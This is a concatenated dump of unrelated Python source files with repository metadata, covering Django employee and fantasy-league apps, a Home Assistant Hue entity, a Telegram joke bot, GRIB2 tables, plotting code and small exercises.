from Employee.models import Employee
#from employee.models import *
from .forms import UserLogin,SignUpForm
# Sign Up View
class SignUpView(CreateView):
form_class = SignUpForm
success_url = reverse_lazy('accounts:signup')
template_name = 'commons/signup.html'
class LoginView(View):
def get(self, request):
return render(request, 'commons/login.html', { 'form': AuthenticationForm })
# really low level
def post(self, request):
form = AuthenticationForm(request, data=request.POST)
print(request.POST)
if form.is_valid():
#print('inside post, is valid')
user = authenticate(
request,
username=form.cleaned_data.get('username'),
password=form.cleaned_data.get('password')
)
#print(user)
if user is None:
return render(
request,
'commons/login.html',
{ 'form': form, 'invalid_creds': True }
)
try:
form.confirm_login_allowed(user)
except ValidationError:
return render(
request,
'commons/login.html',
{ 'form': form, 'invalid_creds': True }
)
login(request, user)
try:
employee = Employee.objects.get(user=user)
except ObjectDoesNotExist:
employee = None
return redirect(reverse('console:dashboard'))
class ProfileView(LoginRequiredMixin, View):
def get(self, request):
surveys = Survey.objects.filter(created_by=request.user).all()
assigned_surveys = SurveyAssignment.objects.filter(assigned_to=request.user).all()
context = {
'surveys': surveys,
'assigned_surveys': assigned_surveys
}
return render(request, 'console/dashboard.html', context)
class LogoutView(View):
def get(self, request):
logout(request)
return HttpResponseRedirect(settings.LOGIN_URL)
@login_required(login_url='/login/')
def home(request):
return render(request, 'console/dashboard.html')
def changepassword(request):
if not request.user.is_authenticated:
return redirect('/')
'''
Please work on me -> success & error messages & style templates
'''
if request.method == 'POST':
form = PasswordChangeForm(request.user, request.POST)
if form.is_valid():
user = form.save(commit=True)
update_session_auth_hash(request,user)
messages.success(request,'Password changed successfully',extra_tags = 'alert alert-success alert-dismissible show' )
return redirect('accounts:changepassword')
else:
messages.error(request,'Error,changing password',extra_tags = 'alert alert-warning alert-dismissible show' )
return redirect('accounts:changepassword')
form = PasswordChangeForm(request.user)
return render(request,'accounts/change_password_form.html',{'form':form})
def register_user_view(request):
# WORK ON (MESSAGES AND UI) & extend with email field
if request.method == 'POST':
form = UserAddForm(data = request.POST)
if form.is_valid():
instance = form.save(commit = False)
instance.save()
username = form.cleaned_data.get("username")
messages.success(request,'Account created for {0} !!!'.format(username),extra_tags = 'alert alert-success alert-dismissible show' )
return redirect('accounts:register')
else:
messages.error(request,'Username or password is invalid',extra_tags = 'alert alert-warning alert-dismissible show')
return redirect('accounts:register')
form = UserAddForm()
dataset = dict()
dataset['form'] = form
dataset['title'] = 'register users'
return render(request,'accounts/register.html',dataset)
def login_view(request):
'''
work on me - needs messages and redirects
'''
login_user = request.user
if request.method == 'POST':
form = UserLogin(data = request.POST)
if form.is_valid():
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(request, username = username, password = password)
if user and user.is_active:
login(request,user)
if login_user.is_authenticated:
return redirect('dashboard:dashboard')
else:
messages.error(request,'Account is invalid',extra_tags = 'alert alert-error alert-dismissible show' )
return redirect('accounts:login')
else:
return HttpResponse('data not valid')
dataset=dict()
form = UserLogin()
dataset['form'] = form
return render(request,'accounts/login.html',dataset)
def user_profile_view(request):
'''
user profile view -> staffs (No edit) only admin/HR can edit.
'''
user = request.user
if user.is_authenticated:
employee = Employee.objects.filter(user = user).first()
emergency = Emergency.objects.filter(employee = employee).first()
relationship = Relationship.objects.filter(employee = employee).first()
bank = Bank.objects.filter(employee = employee).first()
dataset = dict()
dataset['employee'] = employee
dataset['emergency'] = emergency
dataset['family'] = relationship
dataset['bank'] = bank
return render(request,'dashboard/employee_detail.html',dataset)
return HttpResponse("Sorry , not authenticated for this,admin or whoever you are :)")
def logout_view(request):
logout(request)
return redirect('accounts:login')
def users_list(request):
employees = Employee.objects.all()
return render(request,'accounts/users_table.html',{'employees':employees,'title':'Users List'})
def users_unblock(request,id):
user = get_object_or_404(User,id = id)
emp = Employee.objects.filter(user = user).first()
emp.is_blocked = False
emp.save()
user.is_active = True
user.save()
return redirect('accounts:users')
def users_block(request,id):
user = get_object_or_404(User,id = id)
emp = Employee.objects.filter(user = user).first()
emp.is_blocked = True
emp.save()
user.is_active = False
user.save()
return redirect('accounts:users')
def users_blocked_list(request):
blocked_employees = Employee.objects.all_blocked_employees()
return render(request,'accounts/all_deleted_users.html',{'employees':blocked_employees,'title':'blocked users list'})
|
[
"amalrajrs@gmail.com"
] |
amalrajrs@gmail.com
|
d0be734cfa888c010914e448f0d2dd63394549a3
|
371f94ee0f44feeaf68d740f24bd9bb27f83c8aa
|
/app/models.py
|
410942c28fac8f1f24b4850a6988948f8b172033
|
[] |
no_license
|
cjredmond/final_proto
|
f69d62da97428af3d52020054e9a327abbff8d15
|
28d73c7f25a7e8fae07d78b12964cdefeb3103de
|
refs/heads/master
| 2020-09-12T04:57:59.279571
| 2016-11-11T22:44:47
| 2016-11-11T22:44:47
| 73,517,094
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,218
|
py
|
from django.db import models
from django.dispatch import receiver
from django.db.models.signals import post_save
class League(models.Model):
name = models.CharField(max_length=40)
limit = models.IntegerField()
players = models.ManyToManyField('auth.User')
live = models.BooleanField(default=False)
def __str__(self):
return str(self.id)
@property
def get_squads(self):
return self.squad_set.all()
def get_active_teams(self):
return self.team_set.all()
@receiver(post_save, sender=League)
def create(**kwargs):
created = kwargs['created']
instance = kwargs['instance']
teams = Team.objects.filter(league=None)
for team in teams:
Team.objects.create(city=team.city, name=team.name, league=instance, sport=team.sport, pts_last=team.pts_last, pts_proj=team.pts_proj)
class Squad(models.Model):
user = models.OneToOneField('auth.User')
name = models.CharField(max_length=40)
league = models.ForeignKey(League)
def __str__(self):
return self.name
@property
def total_proj(self):
teams = self.team_set.all()
score = 0
for team in teams:
score = score + team.pts_proj
return score
def checker(self, sport):
teams = self.team_set.all()
count = 0
for team in teams:
if team.sport == sport:
count += 1
if count > 2:
return False
return True
SPORTS = [('f', 'football'), ('b', 'baseball'), ('k', 'basketball')]
class Team(models.Model):
city = models.CharField(max_length=50)
name = models.CharField(max_length=50)
squad = models.ForeignKey(Squad,null=True,blank=True)
league = models.ForeignKey(League,null=True,blank=True)
logo = models.FileField(null=True,blank=True)
sport = models.CharField(max_length=1,choices=SPORTS)
pts_last = models.IntegerField()
pts_proj = models.IntegerField()
#base = models.BooleanField(default=False)
def __str__(self):
return self.name
class Schedule(models.Model):
league = models.OneToOneField(League)
@property
def amount(self):
return self.league.get_squads.count()
|
[
"connor.redmond@gmail.com"
] |
connor.redmond@gmail.com
|
1e01c1ba08ee6205b00c1018a1d84b557ec98285
|
1975ecfc048594b1c05913a3c415bf2c233b37d2
|
/playlist_explanation/src/features/common/month.py
|
3b238d330ac9041a38d72abe7295ba15b4f2f136
|
[] |
no_license
|
GiovanniGabbolini/dave
|
2ad35bbd0abf5aefd1c01436690d647f4b39d82c
|
e0ad90a5fd5691a8cd5e9b24261fb4d3d82ea91e
|
refs/heads/master
| 2023-03-17T06:04:15.127171
| 2021-03-18T19:31:43
| 2021-03-18T19:31:43
| 349,158,307
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 160
|
py
|
from src.utils.decorator_annotations import annotations
@annotations({'entailed': True})
def month(date) -> 'month':
return {'value': date['value'].month}
|
[
"giovanni.gabbolini@gmail.com"
] |
giovanni.gabbolini@gmail.com
|
db154f56ea89f913c7ca67af270e96ea17cc6786
|
00e044ab93ae740e29c48a01db0f9671c740ae55
|
/setup.py
|
417b699ace6fb8a27c7d96a90eb5d1b0e378ef12
|
[
"BSD-3-Clause"
] |
permissive
|
kalessin/crawlera-sessions
|
982f73d69bb7f8e6c0b98b39f08d165200d3eb27
|
52f6eeb28c776d013c4dc46559eb4cede57b893e
|
refs/heads/master
| 2023-04-28T12:35:10.088112
| 2023-03-17T20:12:38
| 2023-03-17T20:12:38
| 157,715,690
| 0
| 0
|
BSD-3-Clause
| 2021-11-22T14:03:24
| 2018-11-15T13:26:12
|
Python
|
UTF-8
|
Python
| false
| false
| 883
|
py
|
# Automatically created by: shub deploy
from setuptools import setup, find_packages
setup(
name = 'crawlera-session',
version = '1.2.8',
description = 'Class that provides decorators and functions for easy handling of crawlera sessions in a scrapy spider.',
long_description = open('README.md').read(),
long_description_content_type = 'text/markdown',
license = 'BSD',
author = 'Martin Olveyra',
author_email = 'molveyra@gmail.com',
url = 'https://github.com/kalessin/crawlera-sessions',
packages = find_packages(),
scripts = [],
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
]
)
|
[
"molveyra@gmail.com"
] |
molveyra@gmail.com
|
5ac318576d07212bbea01d60ecc2ffa701080d72
|
870639af1487cf59b548f56c9cd1a45928c1e2c2
|
/homeassistant/components/hue/v2/entity.py
|
9bb81c16fa544659af4f2bbfefd017b9b381aa70
|
[
"Apache-2.0"
] |
permissive
|
atmurray/home-assistant
|
9f050944d26c084f8f21e8612a7b90c0ae909763
|
133cb2c3b0e782f063c8a30de4ff55a5c14b9b03
|
refs/heads/dev
| 2023-03-19T04:26:40.743852
| 2021-11-27T05:58:25
| 2021-11-27T05:58:25
| 234,724,430
| 2
| 0
|
Apache-2.0
| 2023-02-22T06:18:36
| 2020-01-18T11:27:02
|
Python
|
UTF-8
|
Python
| false
| false
| 4,310
|
py
|
"""Generic Hue Entity Model."""
from __future__ import annotations
from aiohue.v2.controllers.base import BaseResourcesController
from aiohue.v2.controllers.events import EventType
from aiohue.v2.models.clip import CLIPResource
from aiohue.v2.models.connectivity import ConnectivityServiceStatus
from aiohue.v2.models.resource import ResourceTypes
from homeassistant.core import callback
from homeassistant.helpers.entity import DeviceInfo, Entity
from homeassistant.helpers.entity_registry import async_get as async_get_entity_registry
from ..bridge import HueBridge
from ..const import DOMAIN
RESOURCE_TYPE_NAMES = {
# a simple mapping of hue resource type to Hass name
ResourceTypes.LIGHT_LEVEL: "Illuminance",
ResourceTypes.DEVICE_POWER: "Battery",
}
class HueBaseEntity(Entity):
"""Generic Entity Class for a Hue resource."""
_attr_should_poll = False
def __init__(
self,
bridge: HueBridge,
controller: BaseResourcesController,
resource: CLIPResource,
) -> None:
"""Initialize a generic Hue resource entity."""
self.bridge = bridge
self.controller = controller
self.resource = resource
self.device = controller.get_device(resource.id)
self.logger = bridge.logger.getChild(resource.type.value)
# Entity class attributes
self._attr_unique_id = resource.id
# device is precreated in main handler
# this attaches the entity to the precreated device
if self.device is not None:
self._attr_device_info = DeviceInfo(
identifiers={(DOMAIN, self.device.id)},
)
@property
def name(self) -> str:
"""Return name for the entity."""
if self.device is None:
# this is just a guard
# creating a pretty name for device-less entities (e.g. groups/scenes)
# should be handled in the platform instead
return self.resource.type.value
dev_name = self.device.metadata.name
# if resource is a light, use the device name
if self.resource.type == ResourceTypes.LIGHT:
return dev_name
# for sensors etc, use devicename + pretty name of type
type_title = RESOURCE_TYPE_NAMES.get(
self.resource.type, self.resource.type.value.replace("_", " ").title()
)
return f"{dev_name}: {type_title}"
async def async_added_to_hass(self) -> None:
"""Call when entity is added."""
# Add value_changed callbacks.
self.async_on_remove(
self.controller.subscribe(
self._handle_event,
self.resource.id,
(EventType.RESOURCE_UPDATED, EventType.RESOURCE_DELETED),
)
)
@property
def available(self) -> bool:
"""Return entity availability."""
if self.device is None:
# devices without a device attached should be always available
return True
if self.resource.type == ResourceTypes.ZIGBEE_CONNECTIVITY:
# the zigbee connectivity sensor itself should be always available
return True
if zigbee := self.bridge.api.devices.get_zigbee_connectivity(self.device.id):
# all device-attached entities get availability from the zigbee connectivity
return zigbee.status == ConnectivityServiceStatus.CONNECTED
return True
@callback
def on_update(self) -> None:
"""Call on update event."""
# used in subclasses
@callback
def _handle_event(self, event_type: EventType, resource: CLIPResource) -> None:
"""Handle status event for this resource."""
if event_type == EventType.RESOURCE_DELETED and resource.id == self.resource.id:
self.logger.debug("Received delete for %s", self.entity_id)
# non-device bound entities like groups and scenes need to be removed here
# all others will be be removed by device setup in case of device removal
ent_reg = async_get_entity_registry(self.hass)
ent_reg.async_remove(self.entity_id)
else:
self.logger.debug("Received status update for %s", self.entity_id)
self.on_update()
self.async_write_ha_state()
|
[
"noreply@github.com"
] |
atmurray.noreply@github.com
|
f6103c08d17d281520b0332bf0896a292ba689b4
|
7a4649fa35a0306b120c76e448944ff48539c9cc
|
/rerun/11_r_downpayment.py
|
f6953ce828fb427a42f5c0e517e1e209a2ce9edd
|
[] |
no_license
|
sphilmoon/Python3_tutorial_mosh
|
58ec9a1abdf801ccb1d88f85de56baa5f6fb4a7f
|
bb70de5bff7b4d26f58fe1dcdfd4ec4957631bd5
|
refs/heads/main
| 2023-01-24T17:51:56.181367
| 2020-12-06T10:15:00
| 2020-12-06T10:15:00
| 294,370,972
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 195
|
py
|
house_price = 1E6
good_credit = False
if good_credit:
downpayment = 0.1 * house_price
else:
downpayment = 0.2 * house_price
message = f"My downpayment is: ${downpayment}."
print(message)
|
[
"sphilmoon@gmail.com"
] |
sphilmoon@gmail.com
|
ba471b38a7741ee3be4fb20ad9456b982c45fe2b
|
ce76b3ef70b885d7c354b6ddb8447d111548e0f1
|
/old_hand/little_way/say_case_in_way/eye/find_little_fact.py
|
9c9ce14fb0ac99641f3675d853aa3df09b8532f5
|
[] |
no_license
|
JingkaiTang/github-play
|
9bdca4115eee94a7b5e4ae9d3d6052514729ff21
|
51b550425a91a97480714fe9bc63cb5112f6f729
|
refs/heads/master
| 2021-01-20T20:18:21.249162
| 2016-08-19T07:20:12
| 2016-08-19T07:20:12
| 60,834,519
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 186
|
py
|
#! /usr/bin/env python
def case(str_arg):
use_last_case(str_arg)
print('case')
def use_last_case(str_arg):
print(str_arg)
if __name__ == '__main__':
case('want_man')
|
[
"jingkaitang@gmail.com"
] |
jingkaitang@gmail.com
|
d96ba463d4ea4a6fbedb6545ef6a125cb4bb83c8
|
2ca50eb937c02a108bd80f7ed051065f26814921
|
/fabapp/urls.py
|
0096ccea0b61d94c6c8603bb5be829a41aa42907
|
[] |
no_license
|
pythexcel/fab
|
b868f6e597c61aeb1115e66234f1a2a320a9c3a0
|
ce548c79e82eaacfd0c9d17d3e63cec64788e292
|
refs/heads/master
| 2022-12-15T00:24:10.388924
| 2021-07-26T07:58:10
| 2021-07-26T07:58:10
| 197,142,879
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,327
|
py
|
from rest_framework.urlpatterns import format_suffix_patterns
from django.urls import path as url
from fabapp import views
urlpatterns = [
url('test', views.Test.as_view()),
url('register', views.UserRegister.as_view()),
url('login', views.UserAuth.as_view()),
url('forget_password', views.UserPassword.as_view()),
url('profile', views.Userprofile.as_view()),
url('profile/<uuid:pk>', views.Userprofile.as_view()),
url('listexhbiton',views.ListExhibhition.as_view()),
url('exhibition_create', views.CreateExhibition.as_view()),
url('exhibition_update/<uuid:pk>', views.CreateExhibition.as_view()),
url('exifab/<uuid:pk>/<uuid:pk_user>', views.ExhibitionFab.as_view()),
url('exhibtorlist', views.ExhibitorList.as_view()),
url('fabricatorlist', views.FabricatorList.as_view()),
url('banuser/<uuid:pk>', views.BanUser.as_view()),
url('profile/<uuid:pk>', views.Userprofile.as_view()),
url('addprod', views.Addprod.as_view()),
url('addbrand', views.Addbrand.as_view()),
url('addfunr', views.Addfurni.as_view()),
url('listitem', views.listItem.as_view()),
url('chat/<uuid:pk>/<uuid:pk_exi>', views.ChatMessages.as_view()),
url('partuser', views.ParticularUser.as_view())
]
urlpatterns = format_suffix_patterns(urlpatterns, allowed=['json', 'html'])
|
[
"pythexcel@excellencetechnologies.in"
] |
pythexcel@excellencetechnologies.in
|
6e1074fc950074a4da2234e90afc154a5d59de9e
|
2293c76c3d18e2fcd44ded90bd40113d26285663
|
/pyeccodes/defs/grib2/tables/5/4_11_table.py
|
6d45486fdbeaecd83c9e1e5025d319f1596e84f5
|
[
"Apache-2.0"
] |
permissive
|
ecmwf/pyeccodes
|
b1f121dbddf68d176a03805ed5144ba0b37ac211
|
dce2c72d3adcc0cb801731366be53327ce13a00b
|
refs/heads/master
| 2022-04-23T10:37:40.524078
| 2020-04-18T06:30:29
| 2020-04-18T06:30:29
| 255,554,540
| 9
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,099
|
py
|
def load(h):
return ({'abbr': 1,
'code': 1,
'title': 'Successive times processed have same forecast time, start time of '
'forecast is incremented'},
{'abbr': 2,
'code': 2,
'title': 'Successive times processed have same start time of forecast, '
'forecast time is incremented'},
{'abbr': 3,
'code': 3,
'title': 'Successive times processed have start time of forecast incremented '
'and forecast time decremented so that valid time remains constant'},
{'abbr': 4,
'code': 4,
'title': 'Successive times processed have start time of forecast decremented '
'and forecast time incremented so that valid time remains constant'},
{'abbr': 5,
'code': 5,
'title': 'Floating subinterval of time between forecast time and end of '
'overall time interval'},
{'abbr': None, 'code': 255, 'title': 'Missing'})
|
[
"baudouin.raoult@ecmwf.int"
] |
baudouin.raoult@ecmwf.int
|
3bad23447252471f37c8a506d6edc76be962f754
|
1bf2465e4e43d5b8bcdb8eed0c3fdcd999c34b3b
|
/telegrambot/views.py
|
7a7e9c2013ddb5a3cf0e66eff3804fd45a471e1b
|
[] |
no_license
|
suhailvs/telegram_bot
|
075874c36fc03189680ad00b1580272efa47e5a1
|
3f44274a699521dc9b6b737051631932060a7357
|
refs/heads/main
| 2023-02-21T20:37:16.931097
| 2021-01-27T01:46:19
| 2021-01-27T02:00:46
| 332,320,890
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,768
|
py
|
import json
import requests
import random
from telegram import InlineKeyboardMarkup, InlineKeyboardButton
from django.http import HttpResponse
from django.views import generic
from django.conf import settings
from .models import TelegramUser, CallCount
# TELEGRAM_USERNAME = "impress_ai_bot"
class TelegramUserList(generic.ListView):
model = TelegramUser
class TelegramBotView(generic.View):
def update_callcount_and_get_text(self, data):
if 'callback_query' not in data.keys():
return ''
callback_query = data['callback_query']
from_user = callback_query.get('from')
telegram_user, _ = TelegramUser.objects.get_or_create(
telegram_id = from_user.get('id'),
defaults={'username':from_user.get('username',''), 'firstname':from_user.get('first_name','')}
)
button = callback_query.get('data')
call_count, _ = CallCount.objects.get_or_create(user=telegram_user, button=button)
call_count.count += 1
call_count.save()
text = callback_query.get('message','')
return {'chat_id':text.get('chat').get('id'), 'text':button}
def send_messages(self, message):
jokes = {
'stupid': ["""Yo' Mama is so stupid, she needs a recipe to make ice cubes.""",
"""Yo' Mama is so stupid, she thinks DNA is the National Dyslexics Association."""],
'fat': ["""Yo' Mama is so fat, when she goes to a restaurant, instead of a menu, she gets an estimate.""",
""" Yo' Mama is so fat, when the cops see her on a street corner, they yell, "Hey you guys, break it up!" """],
'dumb': ["""Yo' Mama is so dumb, when God was giving out brains, she thought they were milkshakes and asked for extra thick.""",
"""Yo' Mama is so dumb, she locked her keys inside her motorcycle."""]
}
result_message = {'chat_id': message['chat_id']} # the response needs to contain just a chat_id and text field for telegram to accept it
if 'fat' in message['text']:
result_message['text'] = random.choice(jokes['fat'])
elif 'stupid' in message['text']:
result_message['text'] = random.choice(jokes['stupid'])
elif 'dumb' in message['text']:
result_message['text'] = random.choice(jokes['dumb'])
else:
result_message['text'] = "I don't know any responses for that. If you're interested in yo mama jokes tell me fat, stupid or dumb."
result_message['reply_markup'] = InlineKeyboardMarkup([
[
InlineKeyboardButton('Fat', callback_data='fat'),
InlineKeyboardButton('Stupid', callback_data='stupid'),
InlineKeyboardButton('Dumb', callback_data='dumb')
]
]).to_dict()
requests.post(f"https://api.telegram.org/bot{settings.TELEGRAM_TOKEN}/sendMessage",
headers={"Content-Type": "application/json"}, data=json.dumps(result_message))
# Post function to handle messages in whatever format they come
def post(self, request, *args, **kwargs):
data = json.loads(request.body.decode('utf-8'))
# if no button is clicked on telegram app. ie typed a message
if 'message' in data.keys():
# get text message from telegram
text_from_telegram = {'chat_id':data['message']['from']['id'], 'text':data['message']['text']}
# if a button is clicked on telegram app.
else:
text_from_telegram = self.update_callcount_and_get_text(data)
self.send_messages(text_from_telegram)
return HttpResponse()
|
[
"suhailvs@gmail.com"
] |
suhailvs@gmail.com
|
77ca09b513ef3858857f350d2c125052e51fccc2
|
d4abaedd47e5a3ce3e8aa7893cb63faaa4064551
|
/codeforce/round/prob2.py
|
a7ec801c624ce85cb815427de85ab42d2a986f63
|
[] |
no_license
|
shiv125/Competetive_Programming
|
fc1a39be10c0588e0222efab8809b966430fe20f
|
9c949c6d6b5f83a35d6f5f6a169c493f677f4003
|
refs/heads/master
| 2020-03-15T19:47:12.944241
| 2018-05-06T08:18:11
| 2018-05-06T08:18:11
| 132,317,356
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 319
|
py
|
n,m=map(int,raw_input().split())
poland=[]
eball=[]
for i in range(n):
poland.append(raw_input())
for i in range(m):
eball.append(raw_input())
count=0
for i in poland:
for j in eball:
if i==j:
count+=1
if (n==m):
if (count%2==0):
print "NO"
else:
print "YES"
if (n>m):
print "YES"
if (n<m):
print "NO"
|
[
"shivdutt@shivdutt-Lenovo-G50-80"
] |
shivdutt@shivdutt-Lenovo-G50-80
|
f29162293d3a13e04e0d593b2f83ffadeb585c75
|
3dcfa266c4b7321a4c3a224b98f9ca0dff891e47
|
/archives/weather.py
|
34f3228017b06836750a7051d94df776a005b29f
|
[] |
no_license
|
CandyTt20/Notes
|
a2ef681d123c5219a29334e99aeb900b74bf1834
|
ec092f881122ebdd91ef9764ec7ce4d9cc4723ae
|
refs/heads/master
| 2022-08-21T18:08:33.204223
| 2020-05-19T23:55:49
| 2020-05-19T23:55:49
| 255,209,760
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 985
|
py
|
import matplotlib
from matplotlib import pyplot as plt
import random
import io
import sys
# 改变标准输出的默认编码
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf8')
# 绘图中设置中文字体显示以及粗细MicroSoft YaHei
font = {'family': 'MicroSoft YaHei',
'weight': 'bold',
'size': '10'}
matplotlib.rc("font", **font)
# 设置画图大小
plt.figure(figsize=(50, 10), dpi=80)
t = [random.randint(20, 35) for i in range(0, 120, 10)]
x = range(0, 120, 10)
# 坐标轴显示字符串
_x = x
_x_tick_1 = ['10点{}分'.format(i) for i in range(10, 60, 10)]
_x_tick_2 = ['11点{}分'.format(i) for i in range(0, 60, 10)]
for i in _x_tick_2:
_x_tick_1.append(i)
_x_tick_1.append('12点0分')
plt.xticks(_x, _x_tick_1, rotation=45) # 字符要和数字一一对应,rotation->旋转字符
# 设置描述信息
plt.xlabel('时间')
plt.ylabel('温度(摄氏度)')
plt.title('温度变化图')
# 画图
plt.plot(x, t)
plt.show()
|
[
"458566293@qq.com"
] |
458566293@qq.com
|
3edf3d407e6ecd51e113a38e8f163fb129b401ad
|
54f352a242a8ad6ff5516703e91da61e08d9a9e6
|
/Source Codes/AtCoder/abc059/B/4903797.py
|
b032dc42a02c10e399ae6919bab6161e7ebcff25
|
[] |
no_license
|
Kawser-nerd/CLCDSA
|
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
|
aee32551795763b54acb26856ab239370cac4e75
|
refs/heads/master
| 2022-02-09T11:08:56.588303
| 2022-01-26T18:53:40
| 2022-01-26T18:53:40
| 211,783,197
| 23
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 149
|
py
|
ab = [int(input()) for i in range(2)]
if (ab[0] > ab[1]):
print("GREATER")
elif (ab[0] < ab[1]):
print("LESS")
else:
print("EQUAL")
|
[
"kwnafi@yahoo.com"
] |
kwnafi@yahoo.com
|
c343a8e6103ecb162f0314933cee28a37ae3e35c
|
43102360e998f8972e06689f64f39c7cf22479d7
|
/Decision Trees/Applying Decision Trees-92.py
|
59662f44cd14ce508327652d24d4176d49e44b9b
|
[] |
no_license
|
HarshCasper/Dataquest-Tracks
|
8da914101c19442a63ab46732a1cc792c135c3c9
|
9fc87415377824cf2c82d9ed34178ee53509eb67
|
refs/heads/master
| 2020-12-21T21:04:19.015006
| 2020-01-27T18:28:55
| 2020-01-27T18:28:55
| 236,560,422
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,619
|
py
|
## 2. Using Decision Trees With scikit-learn ##
from sklearn.tree import DecisionTreeClassifier
# A list of columns to train with
# We've already converted all columns to numeric
columns = ["age", "workclass", "education_num", "marital_status", "occupation", "relationship", "race", "sex", "hours_per_week", "native_country"]
# Instantiate the classifier
# Set random_state to 1 to make sure the results are consistent
clf = DecisionTreeClassifier(random_state=1)
# We've already loaded the variable "income," which contains all of the income data
clf.fit(income[columns], income["high_income"])
## 3. Splitting the Data into Train and Test Sets ##
import numpy
import math
# Set a random seed so the shuffle is the same every time
numpy.random.seed(1)
# Shuffle the rows
# This permutes the index randomly using numpy.random.permutation
# Then, it reindexes the dataframe with the result
# The net effect is to put the rows into random order
income = income.reindex(numpy.random.permutation(income.index))
train_max_row = math.floor(income.shape[0] * .8)
train = income.iloc[:train_max_row]
test = income.iloc[train_max_row:]
## 4. Evaluating Error With AUC ##
from sklearn.metrics import roc_auc_score
clf = DecisionTreeClassifier(random_state=1)
clf.fit(train[columns], train["high_income"])
predictions = clf.predict(test[columns])
error = roc_auc_score(test["high_income"], predictions)
print(error)
## 5. Computing Error on the Training Set ##
predictions = clf.predict(train[columns])
print(roc_auc_score(train["high_income"], predictions))
## 7. Reducing Overfitting With a Shallower Tree ##
# Decision trees model from the last screen
clf = DecisionTreeClassifier(random_state=1)
clf = DecisionTreeClassifier(min_samples_split=13, random_state=1)
clf.fit(train[columns], train["high_income"])
predictions = clf.predict(test[columns])
test_auc = roc_auc_score(test["high_income"], predictions)
train_predictions = clf.predict(train[columns])
train_auc = roc_auc_score(train["high_income"], train_predictions)
print(test_auc)
print(train_auc)
## 8. Tweaking Parameters to Adjust AUC ##
# The first decision trees model we trained and tested
clf = DecisionTreeClassifier(random_state=1)
clf.fit(train[columns], train["high_income"])
predictions = clf.predict(test[columns])
test_auc = roc_auc_score(test["high_income"], predictions)
train_predictions = clf.predict(train[columns])
train_auc = roc_auc_score(train["high_income"], train_predictions)
print(test_auc)
print(train_auc)
clf = DecisionTreeClassifier(random_state=1, min_samples_split=13, max_depth=7)
clf.fit(train[columns], train["high_income"])
predictions = clf.predict(test[columns])
test_auc = roc_auc_score(test["high_income"], predictions)
train_predictions = clf.predict(train[columns])
train_auc = roc_auc_score(train["high_income"], train_predictions)
print(test_auc)
print(train_auc)
## 9. Tweaking Tree Depth to Adjust AUC ##
# The first decision tree model we trained and tested
clf = DecisionTreeClassifier(random_state=1)
clf.fit(train[columns], train["high_income"])
predictions = clf.predict(test[columns])
test_auc = roc_auc_score(test["high_income"], predictions)
train_predictions = clf.predict(train[columns])
train_auc = roc_auc_score(train["high_income"], train_predictions)
print(test_auc)
print(train_auc)
clf = DecisionTreeClassifier(random_state=1, min_samples_split=100, max_depth=2)
clf.fit(train[columns], train["high_income"])
predictions = clf.predict(test[columns])
test_auc = roc_auc_score(test["high_income"], predictions)
train_predictions = clf.predict(train[columns])
train_auc = roc_auc_score(train["high_income"], train_predictions)
print(test_auc)
print(train_auc)
## 12. Exploring Decision Tree Variance ##
numpy.random.seed(1)
# Generate a column containing random numbers from 0 to 4
income["noise"] = numpy.random.randint(4, size=income.shape[0])
# Adjust "columns" to include the noise column
columns = ["noise", "age", "workclass", "education_num", "marital_status", "occupation", "relationship", "race", "sex", "hours_per_week", "native_country"]
# Make new train and test sets
train_max_row = math.floor(income.shape[0] * .8)
train = income.iloc[:train_max_row]
test = income.iloc[train_max_row:]
# Initialize the classifier
clf = DecisionTreeClassifier(random_state=1)
clf.fit(train[columns], train["high_income"])
predictions = clf.predict(test[columns])
test_auc = roc_auc_score(test["high_income"], predictions)
train_predictions = clf.predict(train[columns])
train_auc = roc_auc_score(train["high_income"], train_predictions)
print(test_auc)
print(train_auc)
|
[
"noreply@github.com"
] |
HarshCasper.noreply@github.com
|
83b38141d2b2a9fe4ace95e23ea76ba72ddbf024
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02753/s018106418.py
|
43f2350835f00370c906db3dceb850869d7371e6
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 148
|
py
|
# A - Station and Bus
# https://atcoder.jp/contests/abc158/tasks/abc158_a
s = input()
if len(set(s)) == 2:
print('Yes')
else:
print('No')
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
1bf2e6f3d5b517933c42a191a777276597e6abbb
|
58509347cca790fce26884f027425170c5891a17
|
/deep_image_converter/loss/base_loss.py
|
bc1534d557ddf20f3091662c29ed216000fbf416
|
[] |
no_license
|
Hiroshiba/signico_real_to_anime
|
e22d07ca6531b75b3987ecc309e02bcd405f6f61
|
0a68b132fc77e24539d7ddc65b3078fd0c7f3858
|
refs/heads/master
| 2021-01-19T23:25:37.149611
| 2018-03-21T17:24:32
| 2018-03-21T17:32:45
| 88,979,946
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,249
|
py
|
from abc import ABCMeta, abstractmethod
import chainer
from deep_image_converter.config import LossConfig
class BaseLoss(object, metaclass=ABCMeta):
def __init__(self, config: LossConfig, model):
self.config = config
self.model = model
@staticmethod
def blend_loss(loss, blend_config):
